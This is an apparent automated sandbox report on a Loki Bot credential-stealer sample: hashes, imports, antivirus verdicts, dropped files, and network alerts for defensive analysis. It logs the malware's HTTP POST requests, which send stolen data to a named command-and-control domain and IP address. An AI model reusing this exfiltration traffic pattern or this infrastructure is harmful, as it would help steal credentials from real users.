Analysis Task

Analysis type VM label Start time End time Duration
File (Windows) win7-sp1-x64-hpdapp01-1 2018-11-19 18:17:06 2018-11-19 18:19:37 151 seconds

Maldun Score

10.0

Loki Virus

File Details

File name 999.exe
File size 212475 bytes
File type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 824a14d5534e3cb546a836cc8374cc59
SHA1 0c96e4f34564707d49948e9c35da9788006cf854
SHA256 c768d5de6c9a9c7f0db0b3714ec29a6dbb5b21d84bd47d752f1b00a017599eeb
SHA512 192fd702d17e903ddaf019bcca16ab747a407dec539462f96c3f483a45001d08d00885cd50c2447e01a87a1278cd39ca9b69c0e9f756a4f7deb5f808e0e487bc
CRC32 4C6A3BA1
Ssdeep 3072:1jeemVRCAQNb4Dg8quuK45h/cUSLNnalUN2EjxkU8dQoexMVfzlHcgMyH3gI:RURCpt8qGg/cRJahtd66VfzlHQgQI




Hosts Contacted

Direct IP Safety rating Geolocation
185.247.140.223 unknown

DNS Resolution

Domain Safety rating Response
mamujeeproduct.com A 185.247.140.223


PE Information

Image base 0x00400000
Entry point 0x004036fc
Declared checksum 0x00000000
Actual checksum 0x000424a5
Minimum OS version 4.0
Compile time 2016-04-04 04:21:03
Import hash aa1bddb976cc14514caf3362a94d13f7

PE Sections

Name Virtual address Virtual size Raw data size Characteristics Entropy
.text 0x00001000 0x00006ab1 0x00006c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.47
.rdata 0x00008000 0x000014fc 0x00001600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.09
.data 0x0000a000 0x0002d878 0x00001800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.43
.ndata 0x00038000 0x0001f000 0x00000000 IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00057000 0x000041d8 0x00004200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 6.03

Overlay

Offset 0x0000e000
Size 0x00025dfb

Imports

Library: KERNEL32.dll:
0x408070 GetLastError
0x408078 MoveFileW
0x40807c GetFileAttributesW
0x408080 SetFileAttributesW
0x408084 Sleep
0x408088 GetTickCount
0x40808c GetFileSize
0x408090 GetModuleFileNameW
0x408094 GetCurrentProcess
0x408098 CopyFileW
0x40809c ExitProcess
0x4080a8 GetTempPathW
0x4080ac GetCommandLineW
0x4080b0 GetVersion
0x4080b4 SetErrorMode
0x4080b8 GetShortPathNameW
0x4080bc GetFullPathNameW
0x4080c0 GetDiskFreeSpaceW
0x4080c4 GlobalUnlock
0x4080c8 GlobalLock
0x4080cc CreateThread
0x4080d0 CreateDirectoryW
0x4080d4 CreateProcessW
0x4080d8 RemoveDirectoryW
0x4080dc lstrcmpiA
0x4080e0 CreateFileW
0x4080e4 GetTempFileNameW
0x4080e8 WriteFile
0x4080ec lstrcpyA
0x4080f0 lstrcpyW
0x4080f4 MoveFileExW
0x4080f8 lstrcatW
0x4080fc GetSystemDirectoryW
0x408100 GetProcAddress
0x408104 GetModuleHandleA
0x40810c SearchPathW
0x408110 CompareFileTime
0x408114 SetFileTime
0x408118 CloseHandle
0x40811c lstrcmpiW
0x408120 lstrcmpW
0x408124 WaitForSingleObject
0x408128 GlobalFree
0x40812c GlobalAlloc
0x408130 lstrlenW
0x408134 lstrcpynW
0x408138 GetExitCodeProcess
0x40813c DeleteFileW
0x408140 FindFirstFileW
0x408144 FindNextFileW
0x408148 FindClose
0x40814c SetFilePointer
0x408150 MultiByteToWideChar
0x408154 ReadFile
0x408158 lstrlenA
0x40815c MulDiv
0x408168 WideCharToMultiByte
0x40816c LoadLibraryExW
0x408170 GetModuleHandleW
0x408174 FreeLibrary
Library: USER32.dll:
0x408198 GetSystemMenu
0x40819c SetClassLongW
0x4081a0 IsWindowEnabled
0x4081a4 EnableMenuItem
0x4081a8 SetWindowPos
0x4081ac GetSysColor
0x4081b0 GetWindowLongW
0x4081b4 SetCursor
0x4081b8 LoadCursorW
0x4081bc CheckDlgButton
0x4081c0 GetAsyncKeyState
0x4081c4 IsDlgButtonChecked
0x4081c8 GetMessagePos
0x4081cc LoadBitmapW
0x4081d0 CallWindowProcW
0x4081d4 IsWindowVisible
0x4081d8 CloseClipboard
0x4081dc SetClipboardData
0x4081e0 EmptyClipboard
0x4081e4 OpenClipboard
0x4081e8 EndDialog
0x4081ec GetWindowRect
0x4081f0 CreatePopupMenu
0x4081f4 GetSystemMetrics
0x4081f8 SetDlgItemTextW
0x4081fc GetDlgItemTextW
0x408200 MessageBoxIndirectW
0x408204 CharPrevW
0x408208 CharNextA
0x40820c wsprintfA
0x408210 wvsprintfW
0x408214 DispatchMessageW
0x408218 PeekMessageW
0x40821c ReleaseDC
0x408220 EnableWindow
0x408224 InvalidateRect
0x408228 SendMessageW
0x40822c DefWindowProcW
0x408230 BeginPaint
0x408234 GetClientRect
0x408238 FillRect
0x40823c DrawTextW
0x408240 ScreenToClient
0x408244 CreateWindowExW
0x408248 RegisterClassW
0x408250 CharNextW
0x408254 GetClassInfoW
0x408258 DialogBoxParamW
0x40825c CreateDialogParamW
0x408260 ExitWindowsEx
0x408264 GetDC
0x408268 PostQuitMessage
0x40826c SetTimer
0x408270 SetForegroundWindow
0x408274 LoadImageW
0x408278 SetWindowLongW
0x40827c SendMessageTimeoutW
0x408280 FindWindowExW
0x408284 IsWindow
0x408288 GetDlgItem
0x40828c TrackPopupMenu
0x408290 AppendMenuW
0x408294 EndPaint
0x408298 DestroyWindow
0x40829c wsprintfW
0x4082a0 ShowWindow
0x4082a4 SetWindowTextW
Library: GDI32.dll:
0x40804c SetTextColor
0x408050 SelectObject
0x408054 SetBkMode
0x408058 CreateFontIndirectW
0x40805c CreateBrushIndirect
0x408060 DeleteObject
0x408064 GetDeviceCaps
0x408068 SetBkColor
Library: SHELL32.dll:
0x408184 SHGetFileInfoW
0x408188 ShellExecuteW
0x40818c SHBrowseForFolderW
0x408190 SHFileOperationW
Library: ADVAPI32.dll:
0x408000 RegDeleteKeyW
0x408004 SetFileSecurityW
0x408008 OpenProcessToken
0x408014 RegOpenKeyExW
0x408018 RegEnumValueW
0x40801c RegDeleteValueW
0x408020 RegCloseKey
0x408024 RegCreateKeyExW
0x408028 RegSetValueExW
0x40802c RegQueryValueExW
0x408030 RegEnumKeyW
Library: COMCTL32.dll:
0x408038 ImageList_Create
0x40803c ImageList_Destroy
0x408040 ImageList_AddMasked
0x408044 None
Library: ole32.dll:
0x4082ac OleUninitialize
0x4082b0 OleInitialize
0x4082b4 CoTaskMemFree
0x4082b8 CoCreateInstance

Strings

.text
`.rdata
@.data
.ndata
.rsrc
95x:B
v#Vh`1@
Y;5|:B
tWf="
9-LgC
9-LgC
9-LgC
9-XgC
tff95
Ph`6C
Ph`6C
UXTHEME
USERENV
SETUPAPI
APPHELP
PROPSYS
DWMAPI
CRYPTBASE
OLEACC
CLBCATQ
RichEd32
RichEd20
MulDiv
DeleteFileW
FindFirstFileW
FindNextFileW
FindClose
SetFilePointer
MultiByteToWideChar
ReadFile
lstrlenA
WideCharToMultiByte
GetPrivateProfileStringW
WritePrivateProfileStringW
FreeLibrary
LoadLibraryExW
GetModuleHandleW
GetExitCodeProcess
WaitForSingleObject
GlobalAlloc
GlobalFree
ExpandEnvironmentStringsW
lstrcmpW
lstrcmpiW
CloseHandle
SetFileTime
CompareFileTime
SearchPathW
GetShortPathNameW
GetFullPathNameW
MoveFileW
GetLastError
SetCurrentDirectoryW
GetFileAttributesW
SetFileAttributesW
Sleep
GetTickCount
GetFileSize
GetModuleFileNameW
GetCurrentProcess
CopyFileW
ExitProcess
SetEnvironmentVariableW
GetWindowsDirectoryW
GetTempPathW
GetCommandLineW
GetVersion
SetErrorMode
lstrlenW
lstrcpynW
GetDiskFreeSpaceW
GlobalUnlock
GlobalLock
CreateThread
CreateDirectoryW
CreateProcessW
RemoveDirectoryW
lstrcmpiA
CreateFileW
GetTempFileNameW
WriteFile
lstrcpyA
lstrcpyW
MoveFileExW
lstrcatW
GetSystemDirectoryW
GetProcAddress
GetModuleHandleA
KERNEL32.dll
EndPaint
DrawTextW
FillRect
GetClientRect
BeginPaint
DefWindowProcW
SendMessageW
InvalidateRect
EnableWindow
ReleaseDC
GetDC
LoadImageW
SetWindowLongW
GetDlgItem
IsWindow
FindWindowExW
SendMessageTimeoutW
wsprintfW
ShowWindow
SetForegroundWindow
PostQuitMessage
SetWindowTextW
SetTimer
CreateDialogParamW
DestroyWindow
ExitWindowsEx
CharNextW
DialogBoxParamW
GetClassInfoW
CreateWindowExW
SystemParametersInfoW
RegisterClassW
EndDialog
ScreenToClient
GetWindowRect
EnableMenuItem
GetSystemMenu
SetClassLongW
IsWindowEnabled
SetWindowPos
GetSysColor
GetWindowLongW
SetCursor
LoadCursorW
CheckDlgButton
GetAsyncKeyState
IsDlgButtonChecked
GetMessagePos
LoadBitmapW
CallWindowProcW
IsWindowVisible
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
TrackPopupMenu
AppendMenuW
CreatePopupMenu
GetSystemMetrics
SetDlgItemTextW
GetDlgItemTextW
MessageBoxIndirectW
CharPrevW
CharNextA
wsprintfA
wvsprintfW
DispatchMessageW
PeekMessageW
USER32.dll
SelectObject
SetTextColor
SetBkMode
CreateFontIndirectW
CreateBrushIndirect
DeleteObject
GetDeviceCaps
SetBkColor
GDI32.dll
SHFileOperationW
ShellExecuteW
SHGetFileInfoW
SHBrowseForFolderW
SHGetPathFromIDListW
SHGetSpecialFolderLocation
SHELL32.dll
RegEnumValueW
RegEnumKeyW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
RegDeleteValueW
RegDeleteKeyW
RegOpenKeyExW
AdjustTokenPrivileges
LookupPrivilegeValueW
OpenProcessToken
SetFileSecurityW
ADVAPI32.dll
ImageList_Destroy
ImageList_AddMasked
ImageList_Create
COMCTL32.dll
CoCreateInstance
OleUninitialize
OleInitialize
CoTaskMemFree
ole32.dll
VerQueryValueW
GetFileVersionInfoW
GetFileVersionInfoSizeW
VERSION
SHGetFolderPathW
SHFOLDER
SHAutoComplete
SHLWAPI
SHELL32
InitiateShutdownW
RegDeleteKeyExW
ADVAPI32
GetUserDefaultUILanguage
GetDiskFreeSpaceExW
SetDefaultDllDirectories
KERNEL32
{s<.8
wwwwp
wwwwww
wwwwww
wwwwwwp
wwwwwwp
wwwwww
wwwwp
wwwwwwwx
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
fffffox
wwwwww
wwwwwx
fffox
fffox
fffox
fffox
fffox
fffox
fffox
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0rc1</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
NullsoftInst @
UlU+2
RichEdit
RichEdit20W
.DEFAULT\Control Panel\International
Control Panel\Desktop\ResourceLocale
Software\Microsoft\Windows\CurrentVersion
\Microsoft\Internet Explorer\Quick Launch
@logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0x%08x"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortcut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not initialize OLE
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
HideWindow
Pop: stack empty
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: error, user cancel
File: skipped: "%s" (overwriteflag=%d)
File: error, user abort
File: error, user retry
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
SetCurrentDirectory(%s) failed (%d)
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes failed.
SetFileAttributes: "%s":%08X
BringToFront
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
Error launching installer
... %d%%
SeShutdownPrivilege
\Temp
NSIS Error
Error writing temporary file. Make sure your temp folder is valid.
@install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%02x%c
%s%S.dll
MS Shell Dlg
MS Shell Dlg
msctls_progress32
SysListView32
MS Shell Dlg
MS Shell Dlg
Please wait while Setup is loading...

Antivirus Scan Results

Antivirus engine/vendor Detection name/rule match Signature database date
Bkav HW32.Packed. 20181113
MicroWorld-eScan Trojan.GenericKD.40750017 20181113
CMC Not detected 20181113
CAT-QuickHeal Not detected 20181113
McAfee Artemis!824A14D5534E 20181113
Cylance Unsafe 20181114
Zillya Not detected 20181113
AegisLab Trojan.Win32.Crypmod.4!c 20181113
TheHacker Not detected 20181113
BitDefender Trojan.GenericKD.40750017 20181114
K7GW Trojan ( 00540f0e1 ) 20181113
K7AntiVirus Trojan ( 00540f0e1 ) 20181113
TrendMicro Not detected 20181113
Baidu Not detected 20181112
Babable Not detected 20180918
Cyren W32/Trojan.LEAQ-8066 20181113
Symantec Trojan Horse 20181113
ESET-NOD32 a variant of Win32/Injector.EBOK 20181113
TrendMicro-HouseCall Not detected 20181113
Paloalto generic.ml 20181114
ClamAV Not detected 20181113
GData Trojan.GenericKD.40750017 20181114
Kaspersky HEUR:Trojan-Ransom.Win32.Crypmod.gen 20181113
Alibaba Not detected 20180921
NANO-Antivirus Not detected 20181113
ViRobot Trojan.Win32.Z.Agent.212475 20181113
Rising Not detected 20181113
Endgame malicious (high confidence) 20181108
Trustlook Not detected 20181114
Sophos Mal/Generic-S 20181113
F-Secure Trojan.GenericKD.40750017 20181114
DrWeb Trojan.PWS.Stealer.25149 20181114
VIPRE Not detected 20181113
Invincea heuristic 20181108
McAfee-GW-Edition BehavesLike.Win32.ObfusRansom.dc 20181113
Emsisoft Trojan.GenericKD.40750017 (B) 20181114
SentinelOne static engine - malicious 20181011
F-Prot Not detected 20181113
Jiangmin Not detected 20181114
Webroot W32.Trojan.Gen 20181114
Avira Not detected 20181114
MAX malware (ai score=81) 20181114
Antiy-AVL Not detected 20181113
Kingsoft Not detected 20181114
Arcabit Trojan.Generic.D26DCBC1 20181113
SUPERAntiSpyware Not detected 20181107
ZoneAlarm HEUR:Trojan-Ransom.Win32.Crypmod.gen 20181113
Avast-Mobile Not detected 20181113
Microsoft Trojan:Win32/Skeeyah.A!rfn 20181113
AhnLab-V3 Trojan/Win32.Injector.C2826270 20181113
ALYac Not detected 20181113
TACHYON Not detected 20181113
VBA32 Not detected 20181113
Malwarebytes Trojan.Injector 20181113
Panda Trj/CI.A 20181113
Zoner Not detected 20181114
Tencent Not detected 20181114
Yandex Not detected 20181113
Ikarus Trojan.NSIS.Agent 20181113
eGambit Not detected 20181114
Fortinet W32/Injector.EBOK!tr 20181113
Ad-Aware Not detected 20181112
AVG Win32:Malware-gen 20181113
Cybereason malicious.345647 20180225
Avast Win32:Malware-gen 20181113
CrowdStrike malicious_confidence_80% (W) 20181022
Qihoo-360 Win32/Trojan.Ransom.709 20181114

Process Tree

999.exe, PID: 2420, parent PID: 2288
999.exe, PID: 2536, parent PID: 2420
services.exe, PID: 428, parent PID: 332
mscorsvw.exe, PID: 480, parent PID: 428
taskhost.exe, PID: 280, parent PID: 428
mscorsvw.exe, PID: 2528, parent PID: 428

TCP

Source address Source port Destination address Destination port
192.168.122.201 49171 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49173 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49174 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49177 185.247.140.223 mamujeeproduct.com 80
192.168.122.201 49181 185.247.140.223 mamujeeproduct.com 80

UDP

Source address Source port Destination address Destination port
192.168.122.201 56018 192.168.122.1 53

HTTP Requests

URI HTTP data
URI: http://mamujeeproduct.com/sfran/encode.php
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 246
Connection: close

URI: http://mamujeeproduct.com/sfran/encode.php
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 174
Connection: close

URI: http://mamujeeproduct.com/sfran/encode.php
POST /sfran/encode.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mamujeeproduct.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 737E5412
Content-Length: 147
Connection: close

SMTP Traffic

No SMTP traffic.

IRC Traffic

No IRC requests.

ICMP Traffic

No ICMP traffic.

CIF Report

No CIF results

Network Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol SID Signature Category
2018-11-19 18:18:35.626847+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:33.350577+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:34.706930+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:19:09.803182+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:58.498044+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2021641 ET TROJAN Loki Bot User-Agent (Charon/Inferno) A Network Trojan was detected
2018-11-19 18:18:35.990411+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:19:10.159116+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:18:58.875878+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2024313 ET TROJAN Loki Bot Request for C2 Commands Detected M1 A Network Trojan was detected
2018-11-19 18:19:10.159116+0800 192.168.122.201 49181 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:58.875878+0800 192.168.122.201 49177 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:33.686247+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected
2018-11-19 18:18:33.686247+0800 192.168.122.201 49171 185.247.140.223 80 TCP 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected
2018-11-19 18:18:35.072724+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2024312 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1 A Network Trojan was detected
2018-11-19 18:18:35.990411+0800 192.168.122.201 49174 185.247.140.223 80 TCP 2024318 ET TROJAN Loki Bot Request for C2 Commands Detected M2 A Network Trojan was detected
2018-11-19 18:18:35.072724+0800 192.168.122.201 49173 185.247.140.223 80 TCP 2024317 ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2 A Network Trojan was detected

TLS

No TLS

Suricata HTTP

No Suricata HTTP

No files extracted from network traffic

Dropped Files

File name 8620DB.lck
Related file C:\Users\test\AppData\Roaming\8215A8\8620DB.lck
File size 1 bytes
File type very short file (no magic)
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
CRC32 83DCEFB7
Ssdeep 3:U:U

File name bunny.dll
Related file C:\Users\test\AppData\Local\Temp\bunny.dll
File size 19968 bytes
File type PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5 af01229adb25ac310922f3fef7343ad9
SHA1 a3efd4eceb3e69d67aa16f752e1b5fcf40d3867b
SHA256 b879bf1e60cb6121ce95b58cd946a5cc15848bfb8d681ffc0e5f50f0fc71af69
CRC32 D818BA65
Ssdeep 384:DCPaqCmAPyVEZonWjbY7K85dzLRO6FYYlmWSBLVYmTNWKgmfnfkW5bc:DGaqCPyWZ0eb0ldLRfFYYgyqUVm/f

File name System.dll
Related file C:\Users\test\AppData\Local\Temp\nsi77BF.tmp\System.dll
File size 11776 bytes
File type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 75ed96254fbf894e42058062b4b4f0d1
SHA1 996503f1383b49021eb3427bc28d13b5bbd11977
SHA256 a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
CRC32 BFE90AC5
Ssdeep 192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV

File name 9435f817-fed2-454e-88cd-7f78fda62c48
Related file C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48
File size 12 bytes
File type data
MD5 e456e1e43dd4735ef5f29b0f17fdf719
SHA1 8101086a56679b938063eadec0174f228e31f541
SHA256 787bded6b6fc8db22462b4ffff5948c67b8b6da2b5144a6e29c321ade627a3f2
CRC32 6584BCE6
Ssdeep 3:IqGlll:IqC

File name made.rtf
Related file C:\Users\test\AppData\Local\Temp\made.rtf
File size 7 bytes
File type Rich Text Format data, version 1, unknown character set
MD5 8274425de767b30b2fff1124ab54abb5
SHA1 2201589aa3ed709b3665e4ff979e10c6ad5137fc
SHA256 0d6afb7e939f0936f40afdc759b5a354ea5427ec250a47e7b904ab1ea800a01d
CRC32 CBB3AAE6
Ssdeep 3:gOY:w
Yara
  • Detected no presence of any attachment
  • Detected no presence of any image
  • Detected no presence of any url

File name Marabou
Related file C:\Users\test\AppData\Local\Temp\Marabou
File size 128871 bytes
File type data
MD5 c1b7ea540baf0d8506932f22bd92d9a6
SHA1 a5cda2a03c13231a48738b5675ad27e50c05aadb
SHA256 0b7927557cb33169d038806e293d421c66da8fa7f2b615b42c40a13fca2234e5
CRC32 3491F6E4
Ssdeep 1536:VIu2znI+54ZFJUovSG2227jAozdvWU8jZdtMn9ozR4yAaegj3GMVfzldntcg5zj5:qnalUN2EjxkU8dQoexMVfzlHcgb

File name 8620DB.hdb
Related file C:\Users\test\AppData\Roaming\8215A8\8620DB.hdb
File size 4 bytes
File type data
MD5 247a4d7d86c77e6986a634ce0740338b
SHA1 35ea226f515758a6d7830d0929a4cccd7aedc9e0
SHA256 fbb2cbd2e352227610b639f462cb4b154ef4215ec772da7a352e10d3af0c7221
CRC32 56396382
Ssdeep 3:xon:+n

No similar analyses found.

Processing ( 28.641 seconds )

  • 12.708 Suricata
  • 10.021 NetworkAnalysis
  • 1.497 Static
  • 1.418 BehaviorAnalysis
  • 1.366 VirusTotal
  • 0.639 TargetInfo
  • 0.431 Dropped
  • 0.424 peid
  • 0.06 Debug
  • 0.058 AnalysisInfo
  • 0.015 Strings
  • 0.003 Memory
  • 0.001 config_decoder

Signatures ( 3.389 seconds )

  • 2.003 md_url_bl
  • 0.452 md_bad_drop
  • 0.11 antiav_detectreg
  • 0.072 api_spamming
  • 0.059 antivm_vbox_libs
  • 0.059 stealth_timeout
  • 0.056 stealth_decoy_document
  • 0.051 infostealer_ftp
  • 0.04 antiav_detectfile
  • 0.031 infostealer_im
  • 0.028 infostealer_bitcoin
  • 0.027 exec_crash
  • 0.023 stealth_file
  • 0.02 infostealer_mail
  • 0.019 antisandbox_sunbelt_libs
  • 0.018 md_domain_bl
  • 0.017 antiav_avast_libs
  • 0.016 antivm_vmware_libs
  • 0.016 antivm_vbox_files
  • 0.014 antisandbox_sboxie_libs
  • 0.014 antiav_bitdefender_libs
  • 0.011 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 geodo_banking_trojan
  • 0.009 reads_self
  • 0.009 shifu_behavior
  • 0.009 virus
  • 0.008 bootkit
  • 0.008 kibex_behavior
  • 0.008 antivm_generic_disk
  • 0.007 antivm_generic_services
  • 0.007 betabot_behavior
  • 0.007 anomaly_persistence_autorun
  • 0.007 ransomware_files
  • 0.006 hancitor_behavior
  • 0.006 antivm_xen_keys
  • 0.006 ransomware_extensions
  • 0.005 network_tor
  • 0.005 anormaly_invoke_kills
  • 0.005 antivm_parallels_keys
  • 0.005 darkcomet_regkeys
  • 0.005 network_http
  • 0.005 rat_pcclient
  • 0.004 antivm_generic_diskreg
  • 0.003 tinba_behavior
  • 0.003 hawkeye_behavior
  • 0.003 antisandbox_sleep
  • 0.003 kazybot_behavior
  • 0.003 antivm_vmware_files
  • 0.003 disables_browser_warn
  • 0.003 codelux_behavior
  • 0.003 network_torgateway
  • 0.003 recon_fingerprint
  • 0.002 rat_nanocore
  • 0.002 injection_createremotethread
  • 0.002 cerber_behavior
  • 0.002 kovter_behavior
  • 0.002 sniffer_winpcap
  • 0.002 antisandbox_productid
  • 0.002 antivm_xen_keys
  • 0.002 antivm_hyperv_keys
  • 0.002 antivm_vbox_acpi
  • 0.002 antivm_vbox_keys
  • 0.002 antivm_vmware_keys
  • 0.002 antivm_vpc_keys
  • 0.002 browser_security
  • 0.002 modify_proxy
  • 0.002 targeted_flame
  • 0.001 antiemu_wine_func
  • 0.001 infostealer_browser
  • 0.001 network_anomaly
  • 0.001 ursnif_behavior
  • 0.001 infostealer_browser_password
  • 0.001 bypass_firewall
  • 0.001 antisandbox_sunbelt_files
  • 0.001 antivm_generic_bios
  • 0.001 antivm_generic_cpu
  • 0.001 antivm_generic_system
  • 0.001 antivm_vpc_files
  • 0.001 banker_cridex
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 downloader_cabby
  • 0.001 network_cnc_http
  • 0.001 network_tor_service
  • 0.001 packer_armadillo_regkey
  • 0.001 rat_spynet
  • 0.001 recon_programs
  • 0.001 stealth_modify_uac_prompt

Reporting ( 0.496 seconds )

  • 0.496 Malheur
Task ID 215070
Mongo ID 5bf28e672e06334ad86c89b2
Cuckoo release 1.4-Maldun